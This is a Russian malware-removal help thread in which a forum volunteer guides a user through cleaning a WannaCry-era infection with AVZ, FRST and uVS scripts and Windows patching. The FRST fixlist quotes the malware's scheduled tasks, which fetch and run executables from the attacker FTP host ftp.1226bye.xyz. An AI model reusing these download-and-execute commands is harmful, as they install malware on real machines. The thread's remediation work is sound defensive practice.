Показано с 1 по 14 из 14.

Сообщение "Возникла ошибка при запуске с\windows\debug\item.dat" (заявка № 221728)

  1. #1
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31

    Thumbs up Сообщение "Возникла ошибка при запуске с\windows\debug\item.dat"

    Здравствуйте!
    Прошу помощи в борьбе со зловредом.
    Спасибо!

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,290
    Вес репутации
    384
    Уважаемый(ая) Allexan, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Обновления на систему не поставите - борьба будет вечной.

    Выполните скрипт в AVZ:
    Код:
    begin
     TerminateProcessByName('c:\windows\mssecsvc.exe');
     QuarantineFile('c:\windows\mssecsvc.exe', '');
     DeleteFile('c:\windows\mssecsvc.exe', '');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 2, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Обновления на систему не поставите - борьба будет вечной.
    Спасибо. Будут установлены после лечения.

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
    Не удается.
    Ошибка:
    Результат загрузки
    Ошибка загрузки. Данный файл уже был загружен.
    Прикреплен во вложениях ( quarantine.zip )

    Спасибо.

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Если карантин не грузится по назначению, т. е. по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме - не надо его крепить к сообщению, он просто пуст.

    Остальное?
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Остальное?
    В предыдущем сообщении не загрузились, хотя в личном кабинете отображались во вложениях.
    Теперь загружены.

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Обновление, минимум одно, вот это придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.

    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    Closeprocesses:
    (TODO: <公司名>) C:\Windows\Temp\conhost.exe
    (www.google.com) C:\Windows\debug\lsmos.exe
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{84e50cd2-df36-46d5-910c-7b471f362c92} <==== ATTENTION (Restriction - IP)
    CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [aminlpmkfcdibgpgfajlgnamicjckkjf] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fdjdjkkjoiomafnihnobkinnfjnnlhdg] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gnoechjgbgjkimgdjcjcffhcgndpiabg] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [imkcicmjkjckajdecoehjnncefopolkl] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [jdkihdhlegcdggknokfekoemkjjnjhgi] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lbnlgonhigdaalgmmibbeakhfkpmigil] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [pchfckkccldkbclgdepkaonamkignanh] - hxxp://clients2.google.com/service/update2/crx
    S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
    Virustotal: C:\Windows\SysWOW64\Drivers\64.exe
    Virustotal: C:\Windows\system32\v1.exe
    Virustotal: C:\Windows\system32\upsupx.exe
    Virustotal: C:\Windows\system32\u.exe
    Virustotal: C:\Windows\qeriuwjhrf
    2019-01-29 09:08 - 2019-01-29 23:20 - 000000080 _____ C:\Windows\system32\s
    2019-01-29 09:08 - 2019-01-29 23:20 - 000000078 _____ C:\Windows\system32\ps
    2019-01-29 09:08 - 2019-01-29 23:20 - 000000076 _____ C:\Windows\system32\p
    2019-01-29 06:53 - 2019-01-29 23:23 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\SysWOW64\Drivers\64.exe
    2019-01-29 06:53 - 2019-01-29 23:23 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
    2019-01-29 06:53 - 2019-01-29 23:23 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
    2019-01-29 06:53 - 2019-01-29 23:23 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
    2019-01-29 06:53 - 2019-01-29 23:23 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
    2019-01-29 06:53 - 2019-01-29 23:23 - 000003186 _____ C:\Windows\System32\Tasks\ok
    2019-01-29 06:52 - 2019-01-29 06:52 - 000697744 _____ C:\Windows\system32\v1.exe
    2019-01-29 06:52 - 2019-01-29 06:52 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
    2019-01-29 06:52 - 2019-01-29 06:52 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
    2019-01-29 06:25 - 2019-01-29 06:38 - 003514368 ____S C:\Windows\qeriuwjhrf
    2019-01-27 11:46 - 2019-01-29 23:23 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
    C:\Windows\SysWOW64\scrobj.dll
    C:\Windows\Temp\conhost.exe
    C:\Windows\debug\lsmos.exe
    C:\Windows\Temp\*.*
    Task: {1602195B-679D-455B-9E4E-65ED15348FA9} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
    Task: {A0074E6C-3D0E-40BE-AE14-043904F26267} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
    Task: {EDE596D2-0EE1-4D67-AD43-FD4F919F5319} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
    Task: {F20B2120-DB9D-49E5-A9FC-66FB9D024F78} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
    Task: {FECC9A9C-4EBC-4877-81AB-5A44C831BBE9} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\": <==== ATTENTION
    WMI:subscription\__EventFilter->fuckyoumm3: <==== ATTENTION
    FirewallRules: [TCP Query User{6CCCB871-DEE2-439B-A558-0513E22005FA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
    FirewallRules: [UDP Query User{D563E172-907C-48CC-8016-49C5E7E41FD6}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe No File
    FirewallRules: [{4BC6548D-C043-443B-8E72-696D37332F52}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
    FirewallRules: [{BF8A0F99-CF2E-492C-8B94-3F6481899012}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe No File
    FirewallRules: [{196A500D-398D-45BA-9D53-2697D9484813}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
    FirewallRules: [{1DEEF9B8-FF26-406C-BC7F-F3DAD3C34773}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe No File
    FirewallRules: [{CA380F18-17C6-461E-9586-3B76D1333C3B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
    FirewallRules: [{FA2F0CF4-EADB-449E-83B9-7A87DEF378BD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe No File
    FirewallRules: [TCP Query User{88AA0036-191A-4623-AA85-31A24D000C05}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
    FirewallRules: [UDP Query User{6C3086B8-D205-434C-A3A5-D7C6135461CB}C:\users\boris\appdata\local\temp\keygen.exe] => (Allow) C:\users\boris\appdata\local\temp\keygen.exe No File
    FirewallRules: [TCP Query User{33292F7E-B2C6-4024-A757-F49460D59750}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
    FirewallRules: [UDP Query User{31534FE0-2BD0-448E-99C7-D72D4A5DCDAF}C:\hs\hearthstone\hearthstone.exe] => (Allow) C:\hs\hearthstone\hearthstone.exe No File
    FirewallRules: [{A0245617-E091-4F44-A064-48FA5CE0B820}] => (Block) LPort=445
    FirewallRules: [{321FF512-75EA-437F-AB10-E3AD4DBFFDB4}] => (Block) LPort=139
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
    Файл C:\TDSSKiller.***_log.txt приложите в теме.
    (где *** - версия программы, дата и время запуска.)
    Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.

    После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.
    WBR,
    Vadim

  9. Это понравилось:


  10. #8
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Обновление, минимум одно, вот это придётся ставить в процессе лечения, иначе рецидив неизбежен, что и наблюдается.
    Обновление KB4012212 не устанавливается с ошибкой:
    Обновление не применимо к этому компьютеру
    Сервис пак установлен ( W7 Ultimate SP1 x64 )
    Центр обновления перестал работать и выдает ошибку 8070422.
    Починить пока не удается. Есть в сети подобные случаи выхода из строя центра обновления после инфицирования, решений нет.

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Файл C:\TDSSKiller.***_log.txt приложите в теме.
    Во вложении.

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Если найдёт Rootkit.Boot.DarkGalaxy.* - лечите сразу.
    Не нашел.

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    После выполения всех пунктов, включая установку обновления сделайте новый лог FRST, будем дочищать.
    Во вложении.

    СПАСИБО!!!!!

  11. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Для контроля сделайте такой ещё лог.

    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    Если файл не влезет во вложения, загрузите в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку.

    Видимо, кривой дистрибутив 7-ки используете.

    Скачайте Windows Repair (All In One), распакуйте, запустите, "Jump To Repairs", "Open Repairs", отметьте пункты:
    14 "Remove Temp Files"
    16 "Repair Windows Updates"
    25 "Restore Important Windows Services"
    26 "Set Windows Services To Default Startup"
    и нажмите "Start Repairs".
    После перезагрузки проверяйте работу обновления системы.
    WBR,
    Vadim

  12. #10
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Для контроля сделайте такой ещё лог.
    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    Во вложении.

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Скачайте Windows Repair (All In One), распакуйте, запустите
    Обновление работает. KB4012212 установлено.

    На всякий случай, свежие логи Farbar Recovery Scan Tool во вложении.

    Спасибо.

  13. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.1.2 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    regt 25
    delref %Sys32%\DRIVERS\STAROPEN.SYS
    delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\SAFERWEBB\A5OT4XO4VWCZJD.X64.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\DISCOUNNTLEOCATOR\SVPLNCCGEKFU61.X64.DLL
    delref %SystemRoot%\SYSWOW64\MACROMED\FLASH\FLASH32_32_0_0_114.OCX
    delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
    delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\BROWSER.EXE
    delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\BROWSERMANAGER\BROWSERMANAGERSHOW.EXE
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\53.0.2785.116\INSTALLER\CHRMSTP.EXE
    delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\TEMP\HYD6E5C.TMP.1438248788\HTA\3RDPARTY\OCCOMSDK.DLL
    delref {11111111-1111-1111-1111-110011501160}\[CLSID]
    delref %SystemDrive%\USERS\BORIS\APPDATA\LOCAL\YANDEX\UPDATER\YUPDATE-EXECUTOR.EXE
    delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\WINDOWS LIVE\WLIDNSP.DLL
    winsockreset
    deldir C:\Windows\jNWhZ
    del C:\Users\Boris\Desktop\Интернет.lnk
    apply
    deltmp
    restart
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
    Компьютер перезагрузится.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
    WBR,
    Vadim

  14. #12
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    UVS будет лог выполнения скрипта
    Во вложении.

  15. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,579
    Вес репутации
    1086
    Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.

    Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
    Компьютер перезагрузится.
    WBR,
    Vadim

  16. #14
    Junior Member Репутация
    Регистрация
    01.06.2017
    Сообщений
    26
    Вес репутации
    31
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    Всё на этом. Настоятельно рекомендую установить и прочие критические обновления, а лучше включить автоматическое обновление.
    Спасибо!

  • Уважаемый(ая) Allexan, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01622 seconds with 17 queries